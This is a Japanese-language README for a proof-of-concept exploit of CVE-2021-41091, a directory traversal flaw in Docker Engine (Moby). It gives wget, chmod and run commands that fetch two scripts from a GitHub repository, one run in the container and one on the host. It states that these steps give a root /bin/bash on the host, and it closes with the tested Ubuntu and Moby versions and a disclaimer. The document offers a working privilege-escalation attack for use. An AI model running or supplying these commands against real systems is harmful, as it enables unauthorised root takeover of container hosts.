
CVE-2021-41091の概念実証エクスプロイト:Moby(Docker Engine)のディレクトリトラバーサルにより、非特権ユーザーがコンテナからホスト上のSUIDバイナリを実行可能。Ubuntu 20.04用のPoCスクリプトを含む。
Moby(Docker Engine)のバグにより、権限のないユーザーがディレクトリを横断し、コンテナ内のプログラムをホストマシン上で直接実行できる可能性があります。コンテナ内にSUIDプログラムが存在する場合、ユーザーはホストマシン上でそれをSUIDとして実行できます。
コンテナのターミナルで docker.sh ファイルをダウンロードし、rootユーザーとして実行します:
wget https://raw.githubusercontent.com/jrbH4CK/CVE-2021-41091/main/docker.sh
chmod +x docker.sh
./docker.sh
次に、ホストマシンで principal.sh ファイルをダウンロードして実行します:
wget https://raw.githubusercontent.com/jrbH4CK/CVE-2021-41091/main/principal.sh
chmod +x principal.sh
./principal.sh
表示されたコマンドを実行すると、/bin/bash をrootとして実行できるようになります。
これらのスクリプトは、Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-147-generic x86_64) 上の Moby 20.10.5+dfsg1 でテストされました。
このリポジトリの使用は、利用者の責任であり、作者の責任ではありません。